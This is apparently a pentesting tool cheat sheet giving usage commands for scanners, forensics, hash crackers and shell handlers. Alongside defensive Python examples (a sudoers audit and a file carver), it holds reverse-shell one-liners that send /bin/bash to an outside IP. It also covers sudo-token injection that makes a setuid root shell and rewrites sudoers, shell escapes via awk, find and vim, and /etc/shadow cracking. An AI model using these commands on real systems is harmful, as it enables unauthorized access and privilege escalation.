Reference List
Tnmap.py – This program breaks a big network into many small segments to enable parallel scans, multi-host task sharing, and more [Link].
tnmap.py 10.0.0.0/8
SearchSploit – A simple way to search for vulnerabilities on a local copy of exploit-db.com [Link]. Other sources of vulns/exploits are the NIST Search Vulnerability Database [Link], Mitre CVE [Link], and CVE Program Mission [Link].
sudo apt install exploitdb -y
searchsploit wordpress
sudo -V | grep "Sudo ver"
searchsploit "sudo 1.9.5p1"
suBruteForce – Full throttle to get access as a specific user [Link].
./suBF.sh -u username -w top12000.txt -t 0.7 -s 0.007
sudo_inject – Injects into processes that have a valid sudo token and activates our own sudo token [Link].
Will create the binary activate_sudo_token in /tmp. You can use it to activate the sudo token in your session:
bash exploit.sh /tmp/activate_sudo_token sudo su
Will create a sh shell in /tmp owned by root with setuid:
bash exploit_v2.sh /tmp/sh -p
Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo:
bash exploit_v3.sh sudo su
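The defender's counterpart to the third script above is to check whether /etc/sudoers has been altered in the way it describes (tokens that never expire, sudo for everyone). The audit below is an added example, not part of sudo_inject; the sample sudoers fragment is constructed for it, and the exact lines a given script writes are an assumption, so the checks look for the settings themselves (timestamp_timeout=-1, !tty_tickets, an ALL ALL= NOPASSWD rule).

```python
import re
from typing import List

# Constructed sudoers fragment (not copied from any exploit script) showing the
# three settings the audit flags, next to normal root and %sudo entries.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults timestamp_timeout=-1
Defaults !tty_tickets
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
ALL ALL=(ALL) NOPASSWD: ALL
"""

TIMEOUT_RE = re.compile(r"^\s*Defaults\b.*\btimestamp_timeout\s*=\s*(-?\d+)")
TTY_TICKETS_OFF_RE = re.compile(r"^\s*Defaults\b.*!tty_tickets\b")
ALL_NOPASSWD_RE = re.compile(r"^\s*ALL\s+ALL\s*=.*NOPASSWD")


def audit_sudoers(text: str) -> List[str]:
    """Return one finding per risky sudoers line (empty list when clean)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].rstrip()  # drop trailing comments
        if not line:
            continue
        m = TIMEOUT_RE.match(line)
        if m and int(m.group(1)) < 0:
            findings.append(f"line {lineno}: timestamp_timeout={m.group(1)} "
                            "(cached sudo credentials never expire)")
        if TTY_TICKETS_OFF_RE.match(line):
            findings.append(f"line {lineno}: tty_tickets disabled "
                            "(one token is valid across all of a user's sessions)")
        if ALL_NOPASSWD_RE.match(line):
            findings.append(f"line {lineno}: every user gets NOPASSWD sudo")
    return findings


if __name__ == "__main__":
    # On a real host run as root; /etc/sudoers.d/* deserves the same scan.
    with open("/etc/sudoers") as f:
        for finding in audit_sudoers(f.read()):
            print(finding)
```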
Foremost – A forensics tool to recover files based on headers and footers from disk or image file [Link].
sudo apt install foremost
foremost -t jpg,pdf -i image.dd
foremost -t doc,xml -i /dev/sdb1
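To make the header/footer idea behind Foremost concrete, here is a minimal carver of the same style as an added example (not Foremost's code). It only knows JPEG and PDF signatures, scans a constructed byte blob standing in for a disk image, and drops a header whose footer is not found within a size limit, which is the main false-positive control in this technique.

```python
from typing import Dict, List, Tuple

# (header, footer) signatures; extend this table for other file types.
SIGNATURES: Dict[str, Tuple[bytes, bytes]] = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "pdf": (b"%PDF-", b"%%EOF"),
}


def carve(blob: bytes, max_size: int = 10_000_000) -> List[Tuple[str, int, bytes]]:
    """Find known headers and cut each file at its matching footer.

    Returns (type, offset, data) triples sorted by offset. Caveat shared with
    real carvers: a JPEG with an embedded thumbnail contains an inner FFD9, so
    the carved copy can be truncated; validating the result is still needed.
    """
    found = []
    for ftype, (header, footer) in SIGNATURES.items():
        pos = blob.find(header)
        while pos != -1:
            window_end = min(len(blob), pos + max_size)
            end = blob.find(footer, pos + len(header), window_end)
            if end == -1:               # no footer in range: not a usable file
                pos = blob.find(header, pos + 1)
                continue
            end += len(footer)
            found.append((ftype, pos, blob[pos:end]))
            pos = blob.find(header, end)  # resume after the carved file
    return sorted(found, key=lambda f: f[1])


# Constructed "disk image": slack space, a tiny JPEG, junk, a tiny PDF.
SAMPLE_IMAGE = (
    b"\x00" * 16
    + b"\xff\xd8\xff\xe0JFIF-body\xff\xd9"
    + b"random slack"
    + b"%PDF-1.4\nobj\n%%EOF"
    + b"\x00" * 8
)

if __name__ == "__main__":
    for ftype, offset, data in carve(SAMPLE_IMAGE):
        print(f"{ftype} at offset {offset}, {len(data)} bytes")
```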
Zsteg – A Ruby application to detect and extract hidden data in image files [Link].
sudo gem install zsteg
zsteg image.png
ExifTool – An application for reading and writing meta information in a wide variety of files [Link]. Official website [Link].
sudo apt install exiftool
exiftool image.png
exiftool -common image.jpg
exiftool image.jpg | grep GPS
exiftool -all= image.jpg
GDB – The GNU Project debugger, allows one to see what is going on ‘inside’ a program while it executes or what a program was ‘doing’ at the moment it crashed [Link]. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly codes, registers, memory information during debugging, and adds extra commands [Link].
sudo apt install gdb
gdb executable
(gdb) run
SublimeText – A very sophisticated text editor for code and markup [Link].
wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list
sudo apt-get update
sudo apt-get install sublime-text
subl script.sh
NCat – A NetCat version by NMAP that accepts SSL [Link].
while true; do sudo ncat --ssl -lv 53 ; done
while true; do ncat --ssl -v 174.88.217.186 53 -e /bin/bash; sleep 5 ; done
python3 -c 'import pty; pty.spawn("/bin/bash")'
PwnCat – A sophisticated bind and reverse shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat [Link].
pwncat -l -e '/bin/bash' 4444 -k
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1
The first example keeps listening (bind) even after a disconnect.
The second and third are reverse shells that reconnect if Ctrl+C interrupts them; the third works over UDP.
SeatBelt – Performs a number of security-oriented host-survey safety checks [Link].
Seatbelt.exe -group=all -full
Seatbelt.exe -group=user
Seatbelt.exe -group=system
Seatbelt.exe -group=slack
Seatbelt.exe -group=chromium
Seatbelt.exe -group=misc
GoBuster – A tool to brute-force and discover directories, files, and subdomains [Link].
sudo apt install gobuster
gobuster dir -e -t 50 -u http://example.com/ -w /usr/share/wordlists/dirb/common.txt
gobuster dns -d example.com -w subdomains.txt --wildcard
The first example uses -w to give the wordlist file, -u to give the URL or domain, -e for expanded mode, and -t to define the number of threads.
In the second example, it looks for subdomains using dns -d, and --wildcard properly detects the existence of a wildcard record (*.example.com).
SSHuttle – Creates a VPN over the SSH tunnel and allows pivoting into the network laterally [Link]. It does not require any installation or root access on the host machine, just SSHuttle on the client is necessary. Note that ICMP (ping) does not work over this VPN.
sudo apt-get install sshuttle -y
sshuttle -r user@host 10.0.0.0/8
sshuttle --dns -vvr user@host 0/0
Use the argument -r to set the credentials to log in to the host, followed by the network you want to reach over the VPN (10.0.0.0/8 in the first example); with --dns all the DNS requests are also tunneled, and 0/0 means that all the traffic must go through the VPN as well.
BloodHound – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups) [Link].
Run the most recent version of the collector file on the PowerShell of a Windows machine that is connected to an Active Directory:
.\AzureHound.ps1 OR .\SharpHound.exe
Then transfer the output to the machine where BloodHound will analyze it.
It can be installed using the official tutorial [Link] or if you are using Kali just follow the commands:
sudo apt-get install bloodhound -y
sudo neo4j console &
bloodhound &
Go to the page http://localhost:7474/ and enter neo4j as user and password, then change them on the next page.
Use the credentials changed above to connect and import the acquired output files into BloodHound.
Evil-WinRM – WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management protocol [Link]. This app gives a remote PowerShell prompt. It can run locally or in a Docker container.
evil-winrm -i 10.0.0.1 -u user -p password
Armitage – A free GUI for Metasploit [Link]. See also the licensed GUI for Metasploit called Cobalt Strike at [Link].
sudo msfdb init
sudo apt install armitage -y
sudo armitage
FrameBuffer – It is not a tool but a technique to capture the physical video output and export it to a file to be virtualized or stored. It needs the resolution information to make it visible later.
cat /dev/fb0 > fb.raw
cat /sys/class/graphics/fb0/virtual_size
Now use GIMP to visualize the file.
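Because the raw dump carries no resolution or pixel-format information, something has to add it back before the capture can be viewed. The converter below is an added example (not part of any tool on this page) that writes a PPM from the dump using the width and height read from virtual_size; it assumes the common 32 bpp BGRX layout with no per-line padding, which is an assumption to verify against bits_per_pixel and the LineLength reported by fbset -i. The 2x1 sample frame is constructed.

```python
from typing import Tuple


def parse_virtual_size(text: str) -> Tuple[int, int]:
    """Parse the 'W,H' line printed by /sys/class/graphics/fb0/virtual_size."""
    w, h = text.strip().split(",")
    return int(w), int(h)


def fb_to_ppm(raw: bytes, width: int, height: int, bpp: int = 32) -> bytes:
    """Convert a raw framebuffer dump to a binary PPM (P6) image.

    Assumption: 32 bpp with bytes B,G,R,X per pixel and line_length == width*4.
    A dump that is shorter than width*height*4 bytes is rejected rather than
    silently producing a shifted picture.
    """
    if bpp != 32:
        raise ValueError("only 32 bpp BGRX framebuffers are handled here")
    stride = width * 4
    needed = stride * height
    if len(raw) < needed:
        raise ValueError(f"need {needed} bytes for {width}x{height}, got {len(raw)}")
    pixels = bytearray()
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        for x in range(width):
            b, g, r = row[x * 4], row[x * 4 + 1], row[x * 4 + 2]
            pixels += bytes((r, g, b))          # PPM wants R,G,B order
    header = f"P6\n{width} {height}\n255\n".encode()
    return header + bytes(pixels)


# Constructed 2x1 frame in BGRX order: one red pixel, then one blue pixel.
SAMPLE_FB = bytes([0, 0, 255, 0, 255, 0, 0, 0])

if __name__ == "__main__":
    with open("/sys/class/graphics/fb0/virtual_size") as f:
        w, h = parse_virtual_size(f.read())
    with open("fb.raw", "rb") as src, open("fb.ppm", "wb") as dst:
        dst.write(fb_to_ppm(src.read(), w, h))
```

The resulting fb.ppm opens directly in GIMP or any viewer that reads PPM, with no dialog asking for the resolution.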
JohnTheRipper – Tool for cracking hashes [Link]. It is able to find out what kind of hash is being used and adjust the parameters for it automatically.
john single_password.txt
john -w:password.lst user:pass.lst
sudo john /etc/passwd /etc/shadow
58k English words list in upper and lower case [Link].
Tools attached to John:
sudo unshadow /etc/passwd /etc/shadow > unshadow.txt
unique -v -inp=allwords.lst uniques.lst
ColabCat – Use Google Research Colab’s GPU resources to crack hashes with HashCat at [Link] and follow the steps. It is also possible to run John there.
!bash
apt update
apt install john
echo "b50ac41ec20631c7b6be72f070d8ff67" > pass
cat pass
john pass
SMBMap – Lists shared drives, permissions, shared contents, uploads/downloads, and even executes remote commands [Link].
smbmap -H 10.0.0.1 -R
smbmap -u user -p password -H host
enum4linux – A combination of the Samba tools smbclient, rpcclient, net, and nmblookup used for enumeration [Link].
enum4linux.pl -v 10.0.0.1
enum4linux.pl -a 10.0.0.1
enum4linux.pl -r 10.0.0.1
enum4linux.pl -u user -p password -U 10.0.0.1
ProxyChains – Forces the TCP connections of any program through a chain of SOCKS4, SOCKS5, or HTTP proxies defined in its configuration file [Link].
proxychains nmap 10.0.0.1
Edit the configuration file /etc/proxychains4.conf and customize if necessary:
dynamic_chain
#strict_chain
chain_len = 2
proxy_dns
[ProxyList]
#socks5 127.0.0.1 9150 # would use Tor Network
socks4 200.200.200.200 9050 # a customized proxy
socks4 200.200.200.100 9050 # a customized proxy
socks4 200.200.100.100 9050 # a customized proxy
socks4 200.100.100.100 9050 # a customized proxy
A good source of proxies can be found at [Link].
In case you find the message “an existing sandbox was detected” on the terminal, issue the following command:
sudo firecfg --clean
HashID – Identifies the different types of hashes used to protect data and especially passwords [Link]. See also a web tool for the same purpose called TunnelsUp [Link].
pip install hashid
hashid -mj '$2y$10$EtzcwxcVdq7D40GIStLA2u4mxfZfUctoD.fufB7NdAJgjq3ACy2Di'
hashid file.txt
Axel – A multi-threaded Linux CLI download application [Link]. It works as a download accelerator for the command-line interface.
axel -a -n 6 https://example.com/file.gz
Note: -a only shows the progress and -n 6 defines the number of threads.
GettingShell – It is not a tool but a small collection of unexpected ways to get root access or a shell.
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
Vim or Vi (command-line text editor), or the pager More (which can launch Vim), if run by root, can access any file on the system and even start a shell:
- :e /etc/passwd – open the desired file as the running user
- :sh – get a shell as the running user
- :shell – get a shell as the running user
- :set shell=/bin/bash – used to set a non-default shell if necessary